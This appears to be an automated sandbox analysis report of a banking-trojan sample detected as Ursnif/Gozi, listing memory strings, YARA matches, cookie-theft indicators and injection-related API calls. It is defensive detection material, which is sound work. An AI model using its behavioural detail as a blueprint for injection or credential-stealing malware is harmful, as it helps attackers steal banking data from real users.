Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: loaddll32.exe, 00000000.00000002.474298225.000000006E56E000.00000002.00020000.sdmp, SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll String found in binary or memory: http://www.openssl.org/V
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
Source: powershell.exe, 0000001C.00000002.526166101.000002219006F000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001C.00000002.526166101.000002219006F000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001C.00000002.526166101.000002219006F000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000001C.00000002.509128308.000002218020E000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000001C.00000002.526166101.000002219006F000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000024.00000000.479277351.00000000062EE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387854313.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387825227.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.483192314.0000000006000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.394470622.0000000005C1B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.454320398.00000221ED090000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387917414.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.470708873.000000000051E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387785430.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387944110.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.457563065.0000000003350000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.466656010.00000234DC590000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387897096.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387985412.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387963889.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4880, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 3412, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3888, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY
Creates a DirectInput object (often for capturing keystrokes)
Source: loaddll32.exe, 00000000.00000002.471966557.0000000000DCB000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Detected Gozi e-Banking trojan
Source: C:\Windows\SysWOW64\rundll32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 1_2_060222F7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie 1_2_060222F7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 1_2_060222F7
Yara detected Ursnif
Source: Yara match File source: 00000024.00000000.479277351.00000000062EE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387854313.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387825227.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.483192314.0000000006000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.394470622.0000000005C1B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.454320398.00000221ED090000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387917414.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.470708873.000000000051E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387785430.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387944110.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.457563065.0000000003350000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.466656010.00000234DC590000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387897096.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387985412.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387963889.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4880, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 3412, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3888, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000024.00000000.479277351.00000000062EE000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000001C.00000003.454320398.00000221ED090000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000025.00000002.470708873.000000000051E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000025.00000003.466656010.00000234DC590000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Writes registry values via WMI
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4D23C5 NtQueryVirtualMemory, 0_2_6E4D23C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_032E4F73 GetProcAddress,NtCreateSection,memset, 1_2_032E4F73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_032E11A9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 1_2_032E11A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_032E34D0 NtMapViewOfSection, 1_2_032E34D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_032EB159 NtQueryVirtualMemory, 1_2_032EB159
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06015E21 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 1_2_06015E21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06005E8A NtQueryInformationProcess, 1_2_06005E8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0601C6FE NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 1_2_0601C6FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06008F6D NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_06008F6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_060077B0 NtMapViewOfSection, 1_2_060077B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0601FFF2 GetProcAddress,NtCreateSection,memset, 1_2_0601FFF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0600CCD9 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 1_2_0600CCD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0600E529 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 1_2_0600E529
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06010D8D memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 1_2_06010D8D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06022AAC NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 1_2_06022AAC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0600F314 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_0600F314
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06025868 memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, 1_2_06025868
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06022E10 NtQuerySystemInformation,RtlNtStatusToDosError, 1_2_06022E10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0600E6C4 memset,NtQueryInformationProcess, 1_2_0600E6C4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_060117CD memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 1_2_060117CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06014518 NtGetContextThread,RtlNtStatusToDosError, 1_2_06014518
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_060105FC NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 1_2_060105FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06002A0A NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_06002A0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0600A818 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 1_2_0600A818
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06003934 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 1_2_06003934
Source: C:\Windows\System32\control.exe Code function: 37_2_00509B4C NtQueryInformationProcess, 37_2_00509B4C
Source: C:\Windows\System32\control.exe Code function: 37_2_004EF640 NtQueryInformationToken,NtQueryInformationToken,NtClose, 37_2_004EF640
Source: C:\Windows\System32\control.exe Code function: 37_2_00521002 NtProtectVirtualMemory,NtProtectVirtualMemory, 37_2_00521002
Contains functionality to launch a process as a different user
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06002410 CreateProcessAsUserW, 1_2_06002410
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4D21A4 0_2_6E4D21A4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4E9AD7 0_2_6E4E9AD7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4F0EB0 0_2_6E4F0EB0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4E477E 0_2_6E4E477E
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4F13F4 0_2_6E4F13F4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4EA78C 0_2_6E4EA78C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4EA380 0_2_6E4EA380
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4E9FAC 0_2_6E4E9FAC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4EABAC 0_2_6E4EABAC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4EC0E8 0_2_6E4EC0E8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4F309D 0_2_6E4F309D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4F1938 0_2_6E4F1938
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_032EAF34 1_2_032EAF34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_032E28E9 1_2_032E28E9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06013604 1_2_06013604
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06021669 1_2_06021669
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06012678 1_2_06012678
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_060276B0 1_2_060276B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0601CFA3 1_2_0601CFA3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06023C5C 1_2_06023C5C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0601BC93 1_2_0601BC93
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0600C307 1_2_0600C307
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0600BBA1 1_2_0600BBA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06014804 1_2_06014804
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0602086C 1_2_0602086C
Source: C:\Windows\System32\control.exe Code function: 37_2_004F5890 37_2_004F5890
Source: C:\Windows\System32\control.exe Code function: 37_2_004F6B80 37_2_004F6B80
Source: C:\Windows\System32\control.exe Code function: 37_2_004F2854 37_2_004F2854
Source: C:\Windows\System32\control.exe Code function: 37_2_004F386C 37_2_004F386C
Source: C:\Windows\System32\control.exe Code function: 37_2_004F206C 37_2_004F206C
Source: C:\Windows\System32\control.exe Code function: 37_2_004FE808 37_2_004FE808
Source: C:\Windows\System32\control.exe Code function: 37_2_0050E038 37_2_0050E038
Source: C:\Windows\System32\control.exe Code function: 37_2_004E78F0 37_2_004E78F0
Source: C:\Windows\System32\control.exe Code function: 37_2_0050E09C 37_2_0050E09C
Source: C:\Windows\System32\control.exe Code function: 37_2_004F11DC 37_2_004F11DC
Source: C:\Windows\System32\control.exe Code function: 37_2_004E49BC 37_2_004E49BC
Source: C:\Windows\System32\control.exe Code function: 37_2_0050FA10 37_2_0050FA10
Source: C:\Windows\System32\control.exe Code function: 37_2_00506A28 37_2_00506A28
Source: C:\Windows\System32\control.exe Code function: 37_2_004E42CC 37_2_004E42CC
Source: C:\Windows\System32\control.exe Code function: 37_2_004FAACC 37_2_004FAACC
Source: C:\Windows\System32\control.exe Code function: 37_2_00500294 37_2_00500294
Source: C:\Windows\System32\control.exe Code function: 37_2_004E2B40 37_2_004E2B40
Source: C:\Windows\System32\control.exe Code function: 37_2_004F0304 37_2_004F0304
Source: C:\Windows\System32\control.exe Code function: 37_2_005053D4 37_2_005053D4
Source: C:\Windows\System32\control.exe Code function: 37_2_00502BD8 37_2_00502BD8
Source: C:\Windows\System32\control.exe Code function: 37_2_004EEBD0 37_2_004EEBD0
Source: C:\Windows\System32\control.exe Code function: 37_2_004F3BF4 37_2_004F3BF4
Source: C:\Windows\System32\control.exe Code function: 37_2_004EC458 37_2_004EC458
Source: C:\Windows\System32\control.exe Code function: 37_2_00501C68 37_2_00501C68
Source: C:\Windows\System32\control.exe Code function: 37_2_0050D468 37_2_0050D468
Source: C:\Windows\System32\control.exe Code function: 37_2_00509C04 37_2_00509C04
Source: C:\Windows\System32\control.exe Code function: 37_2_004F3438 37_2_004F3438
Source: C:\Windows\System32\control.exe Code function: 37_2_004F44FC 37_2_004F44FC
Source: C:\Windows\System32\control.exe Code function: 37_2_004EDC88 37_2_004EDC88
Source: C:\Windows\System32\control.exe Code function: 37_2_004E74A8 37_2_004E74A8
Source: C:\Windows\System32\control.exe Code function: 37_2_00500D40 37_2_00500D40
Source: C:\Windows\System32\control.exe Code function: 37_2_0050ED7C 37_2_0050ED7C
Source: C:\Windows\System32\control.exe Code function: 37_2_004F7500 37_2_004F7500
Source: C:\Windows\System32\control.exe Code function: 37_2_004E9514 37_2_004E9514
Source: C:\Windows\System32\control.exe Code function: 37_2_004F1D14 37_2_004F1D14
Source: C:\Windows\System32\control.exe Code function: 37_2_004E1D20 37_2_004E1D20
Source: C:\Windows\System32\control.exe Code function: 37_2_00507DDC 37_2_00507DDC
Source: C:\Windows\System32\control.exe Code function: 37_2_004E559C 37_2_004E559C
Source: C:\Windows\System32\control.exe Code function: 37_2_005075B4 37_2_005075B4
Source: C:\Windows\System32\control.exe Code function: 37_2_005015A0 37_2_005015A0
Source: C:\Windows\System32\control.exe Code function: 37_2_004FBE9C 37_2_004FBE9C
Source: C:\Windows\System32\control.exe Code function: 37_2_004F4F5C 37_2_004F4F5C
Source: C:\Windows\System32\control.exe Code function: 37_2_004FEF7C 37_2_004FEF7C
Source: C:\Windows\System32\control.exe Code function: 37_2_004F2F1C 37_2_004F2F1C
Source: C:\Windows\System32\control.exe Code function: 37_2_0050EFD0 37_2_0050EFD0
Source: C:\Windows\System32\control.exe Code function: 37_2_004F97C8 37_2_004F97C8
Source: C:\Windows\System32\control.exe Code function: 37_2_004E3F98 37_2_004E3F98
Found potential string decryption / allocating functions
Source: C:\Windows\System32\loaddll32.exe Code function: String function: 6E4E4394 appears 49 times
PE file does not import any functions
Source: vkjmiujf.dll.34.dr Static PE information: No import functions for PE file found
Source: vy454zdn.dll.32.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
